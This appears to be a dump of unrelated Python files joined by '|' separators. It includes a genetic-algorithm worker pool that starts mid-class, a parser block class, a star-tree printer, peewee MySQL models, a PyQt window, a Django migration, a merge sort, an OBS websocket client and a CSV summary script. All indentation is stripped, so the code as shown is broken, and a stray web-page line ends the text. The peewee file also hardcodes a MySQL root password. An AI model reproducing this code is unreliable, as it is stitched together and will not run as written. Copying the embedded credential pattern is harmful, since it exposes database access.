self.S_b = Array('c', dummy_pool_1)
self.S_w = Array('c', dummy_pool_1)
props_generator.setdefault('S_b', self.S_b)
props_mutator.setdefault('pool', self.pool)
self.start_fit_calc = multiprocessing.Event()
self.start_generators = multiprocessing.Event()
self.start_mutators = multiprocessing.Event()
for gen in xrange(N_workers):
self.generators.append(Generator(self.work_queue, self.result_queue, self.start_generators,props_generator))
self.generators[gen].start()
props_fit_calc = dict( h = self.h, w = self.w, h_dom = 16, w_dom = 16, RanBlockSize = self.RanBlockSize, Dom = self.Dom, pool=self.pool)
for fit in xrange(N_workers):
self.fit_calculators.append(Fitness_evaluator(self.work_queue, self.result_queue, self.start_fit_calc,props_fit_calc))
self.fit_calculators[fit].start()
for mut in xrange(N_workers):
self.mutators.append(Mutator(self.work_queue, self.result_queue, self.start_mutators, props_mutator))
self.mutators[mut].start()
self.curr_ranBlk = []
def update_pool(self,population=None):
blank = ' '
offset = 0
if population==None:
population = self.S_b[:].split()+self.S_w[:].split()
chrom_len = len(population[0])
N = len(population)
for idx, td in enumerate(population):
if not offset+21 == N*chrom_len+N-1:
self.pool[offset:offset+22] = td+blank
offset+=21+1
else:
self.pool[offset:offset+21] = td
def update_Sw(self,population):
offset = 0
blank = ' '
chrom_len = len(population[0])
N = len(population)
for idx, td in enumerate(population):
if not offset+21 == N*chrom_len+N-1:
self.S_w[offset:offset+22] = td+blank
offset+=21+1
else:
self.S_w[offset:offset+21] = td
def update_Sb(self,population):
offset = 0
blank = ' '
chrom_len = len(population[0])
N = len(population)
for idx, td in enumerate(population):
if not offset+21 == N*chrom_len+N-1:
self.S_b[offset:offset+22] = td+blank
offset+=21+1
else:
self.S_b[offset:offset+21] = td
def next_rangBlk(self):
for i in xrange (int(self.w/8)):
for j in xrange (int(self.h/8)):
ranBlk = self.Dom[j*self.RanBlockSize[0]:j*self.RanBlockSize[0]+ self.RanBlockSize[0], i*self.RanBlockSize[1]:i*self.RanBlockSize[1]+self.RanBlockSize[1]]
self.curr_ranBlk = rgb2hex(ranBlk.copy())
for fit_calculator in self.fit_calculators:
self.work_queue.put("Next_ranBlk")
self.start_fit_calc.set()
ACKS = []
while len(ACKS) < len(self.fit_calculators):
ACKS.append(self.result_queue.get())
self.start_fit_calc.clear()
yield self.curr_ranBlk
def calculate_fitness(self, partition):
count = 0
for part in partition:
self.work_queue.put(part)
self.start_fit_calc.set()
# collect the results off the queue
results = []
while len(results) < len(partition):
result = self.result_queue.get()
results.append(result)
queue = []
for h in results:
queue = merge_heaps(queue,h)
mating_pool = nlargest(self.N/2,queue) # Return only the half upper part,
# thise will be to the superior clan
# and are chosen chroms for mating
self.start_fit_calc.clear()
for calculator in self.fit_calculators:
self.work_queue.put("Wait")
ACKS = []
while len(ACKS) < len(self.fit_calculators):
ACKS.append(self.result_queue.get())
self.update_Sb([chrom for meas,chrom in mating_pool])
return mating_pool
def generate_new_offsprings(self, partition):
for part in partition:
self.work_queue.put(part)
self.start_generators.set()
# collect the results off the queue
results = []
while len(results) < len(partition):
result = self.result_queue.get()
results.append(result)
offsprings = []
for resulting in results:
offsprings+=resulting
self.start_generators.clear()
for generators in self.generators:
self.work_queue.put("Wait")
ACKS = []
while len(ACKS) < len(self.generators):
ACKS.append(self.result_queue.get())
self.update_Sw(offsprings)
return offsprings
def apply_mutation(self, partition):
count = 0
for part in partition:
self.work_queue.put(part)
self.start_mutators.set()
# collect the results off the queue
results = []
while len(results) < len(partition):
result = self.result_queue.get()
results.append(result)
mutated_population = []
for result in results:
mutated_population+=result
self.start_mutators.clear()
for mutator in self.mutators:
self.work_queue.put("Wait")
ACKS = []
while len(ACKS) < len(self.mutators):
ACKS.append(self.result_queue.get())
return mutated_population
def update_mutation_rate(self, rate_Pmb, rate_Pmw):
for mutator in self.mutators:
self.work_queue.put("Update_mrate")
self.start_mutators.set()
ACKS = []
while len(ACKS) < len(self.fit_calculators):
ACKS.append(self.result_queue.get())
self.start_mutators.clear()
for mutator in self.mutators:
self.work_queue.put((rate_Pmb, rate_Pmw))
ACKS = []
while len(ACKS) < len(self.generators):
ACKS.append(self.result_queue.get())
def finish_all(self):
for fit_calculator in self.fit_calculators:
self.work_queue.put("Stop")
self.start_fit_calc.set()
for mutator in self.mutators:
self.work_queue.put("Stop")
self.start_mutators.set()
for generator in self.generators:
self.work_queue.put("Stop")
self.start_generators.set()
for fit_calculator in self.fit_calculators:
fit_calculator.join()
for mutator in self.mutators:
mutator.join()
for generator in self.generators:
generator.join()
for fit_calculator in self.fit_calculators:
fit_calculator.terminate()
for mutator in self.mutators:
mutator.terminate()
for generator in self.generators:
generator.terminate()
self.start_generators.clear()
self.start_mutators.clear()
self.start_fit_calc.clear()
|
# -*- encoding: utf-8 -*-
from bnf import Group, TokenFunctor
from tl import ast
class Block(Group):
_keywords = None
_with_expression = None
def __init__(self, keywords, with_expression, min=1, max=1):
self._keywords = keywords
self._with_expression = with_expression
group = [self._keywords]
if self._with_expression == True:
from tl.bnf.expression import Expression
group.extend(["(", Expression, ")"])
from tl.bnf.statement import Statement
group.extend([
"{",
Group([Statement], min=0, max=-1),
"}",
TokenFunctor(self.endScope)]
)
Group.__init__(self, group, min=min, max=max)
self._scope = None
self._expr = None
def match(self, context):
if self._with_expression == True:
self._expr = context.beginExpression()
if isinstance(self._keywords, list):
name = "-".join(self._keywords)+'_'
else:
name = str(self._keywords)+'_'
self._scope = context.beginScope(
ast.SCOPE_TYPES['block'],
name,
generate_unique=True
)
res = Group.match(self, context)
if self._with_expression == True:
context.endExpression()
if self._scope is not None:
context.endScope()
return res
def endScope(self, context):
context.endScope()
context.getCurrentScope().childs.append(self._scope)
if self._expr is not None:
self._expr = self._expr.clean()
statement = ast.Block(self._keywords, self._expr, self._scope)
context.getCurrentScope().statements.append(statement)
self._scope = None
return True
def clone(self):
return Block(self._keywords, self._with_expression, self._min, self._max)
|
"""Output a tree of stars like so:
*
***
*
***
*****
*
***
*****
*******
Input argument is the number of levels to the tree (3 in this example)
"""
from sys import argv
def main(levels):
for level in xrange(levels):
for sub_level in xrange(level+2):
stars = ((2 * sub_level) + 1) * '*'
print ('{:^' + str(2 * levels + 2) + '}').format(stars)
# alternate method without using format centering
# spaces = (levels+2-sub_level) * ' '
# print '{spaces}{stars}'.format(spaces=spaces, stars=stars)
if __name__ == '__main__':
main(int(argv[1]))
|
from peewee import *
import datetime
db=MySQLDatabase("mydb",user="root",password="Aa123456789",host="localhost",port=3306)
class Player(Model):
name=CharField(null=False,unique=False)
age=IntegerField(null=False)
phone=BigIntegerField(null=False)
sport=CharField(null=False)
sub_price = IntegerField(null=True)
sub_type = CharField(null=True)
start_at = DateTimeField(default=datetime.datetime.now)
end_at = DateTimeField(default=datetime.datetime.now)
in_diet=CharField(max_length=100)
other=CharField(max_length=300,null=True ,default=" ")
class Meta:
database = db
class sales(Model):
title = CharField( null=False, unique=False )
price = IntegerField( null=False )
happend_at = DateTimeField(default=datetime.datetime.now)
count=IntegerField( null=False )
class Meta:
database = db
class masrofat(Model):
title = CharField( null=False, unique=False )
price = DecimalField( null=False )
happend_at = DateTimeField(default=datetime.datetime.now)
class Meta:
database = db
db.connect()
db.create_tables([Player,sales,masrofat])
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import Utils
from PyQt5.QtWidgets import QMainWindow
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.statusBar().showMessage('选择连接设备')
self.resize(500, 500)
self.setWindowTitle('Telecontroller')
Utils.center(self)
self.rate = 2.3
pass
def resizeEvent(self, QResizeEvent): # real signature unknown; restored from __doc__
""" resizeEvent(self, QResizeEvent) """
print('resizeEvnet: %s' %QResizeEvent.size())
new_width = QResizeEvent.size().width()
new_height = QResizeEvent.size().height()
old_width = QResizeEvent.oldSize().width()
old_height = QResizeEvent.oldSize().height()
if int(new_width * 2.3) == new_height:
return
if new_height != old_height and new_width == old_width:
self.resize(new_height/2.3, new_height)
elif new_width != old_width and new_height == old_height:
self.resize(new_width, new_width * 2.3)
pass
def changeEvent(self, QEvent): # real signature unknown; restored from __doc__
""" changeEvent(self, QEvent) """
# print('changeEvent: %s' % QEvent)
pass
def moveEvent(self, QMoveEvent): # real signature unknown; restored from __doc__
""" moveEvent(self, QMoveEvent) """
print('moveEvent: %s' % QMoveEvent.pos())
pass
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
app = QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(app.exec_()) |
# Generated by Django 2.2.14 on 2020-08-03 17:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('purchase', '0008_balance_testnet_amount'),
('purchase', '0009_purchase_group'),
]
operations = [
]
|
def msort(l):
if len(l)>1:
t=len(l)//2
it1=iter(msort(l[:t]));x1=next(it1)
it2=iter(msort(l[t:]));x2=next(it2)
l=[]
try:
while True:
if x1<=x2: l.append(x1);x1=next(it1)
else : l.append(x2);x2=next(it2)
except:
if x1<=x2: l.append(x2);l.extend(it2)
else: l.append(x1);l.extend(it1)
return l |
import json
import logging
import threading
import websocket
class OBSRemote(object):
def __init__(self, url):
self.logger = logging.getLogger("OBSRemote")
self.url = url
self.streaming = False
self.streamTime = 0
self.connected = False
def start(self):
self.logger.info("Attempting to open comms with OBS")
self.ws = websocket.WebSocketApp(self.url,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close,
subprotocols=["obsapi"])
self.run_thread = threading.Thread(target=self.ws.run_forever)
self.run_thread.start()
def stop(self):
self.logger.info("Closing comms with OBS")
self.ws.close()
def on_open(self, *args):
self.logger.info("Communication with obs established")
self.connected = True
def on_message(self, ws, msg):
try:
decoded = json.loads(msg)
# self.logger.debug("Received: " + str(decoded))
if 'update-type' in decoded:
if decoded['update-type'] == 'StreamStatus':
self.streamTime = decoded['total-stream-time']
self.streaming = decoded['streaming']
elif decoded['update-type'] == "StreamStarting":
self.streaming = True
elif decoded['update-type'] == "StreamStopping":
self.streaming = False
except Exception as E:
self.logger.warn('Bad thing happened parsing obsremote message')
self.logger.warn(str(E))
return
def on_error(self, ws, error):
if error.errno == 10061:
self.logger.warn("Error, connection to OBS refused, check OBS is running.")
self.connected = False
else:
self.logger.warn('Error ' + str(error))
self.connected = False
return
def on_close(self, ws):
self.logger.info('Socket closed')
self.connected = False
self.streaming = False
return
def set_profile(self, name):
self.logger.info("Setting profile to : %s" % name)
msg = {}
msg['message-id'] = 'ffff34234'
msg['request-type'] = "SetProfile"
msg['profileName'] = name
self.ws.send(json.dumps(msg))
def start_streaming(self, preview=False):
if not self.streaming:
self.logger.info("Sending StartStream")
msg = {}
msg['message-id'] = "123123d"
msg['request-type'] = "StartStopStreaming"
if preview:
msg["preview-only"] = True
self.ws.send(json.dumps(msg))
def stop_streaming(self, preview=False):
if self.streaming:
self.logger.info("Sending StopStream")
msg = {}
msg['message-id'] = "123123d"
msg['request-type'] = "StartStopStreaming"
if preview:
msg["preview-only"] = True
self.ws.send(json.dumps(msg))
return
|
import csv
import re
import sys
import math
def create_summary_files(raw_file, data_file, avgs_file, stds_file):
with open(raw_file, 'r') as f:
add_variables = f.readline().strip().split(',')[3:]
variables = ['lat', 'lon']
for var in add_variables:
var = var.replace('"','').strip()
variables.append(var)
data = []
places = []
for line in f:
place = line.split('"')[1].split(",")[0]
places.append(place)
data_on_line = line.split('"')[1].split(",")[1:3] + line.split('"')[3].split(",")
if data_on_line[0] != "lat":
data.append(data_on_line)
means = []
stds = []
for i in range(len(variables)-2):
tot = 0
missing = 0
for line in data:
if not line[i+2] == "missing":
tot += float(line[i+2])
else:
missing += 1
mean = tot/(len(data)-missing)
means.append("{0:.4f}".format(mean))
squared_deviations = 0
for line in data:
if not line[i+2] == "missing":
squared_deviations += (float(line[i+2])-mean) ** 2
std = math.sqrt(squared_deviations/(len(data)-missing))
stds.append("{0:.4f}".format(std))
with open(avgs_file, "w") as f:
f.write(",".join(variables[2:]) + "\n")
f.write(",".join(means) + "\n")
with open(stds_file, "w") as f:
f.write(",".join(variables[2:]) + "\n")
f.write(",".join(stds) + "\n")
with open(data_file, "w") as f:
f.write("place," + ",".join(variables) + "\n")
i = 0
for line in data:
f.write(places[i] + "," + ",".join(line) + "\n")
i += 1
if __name__ == "__main__":
create_summary_files(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.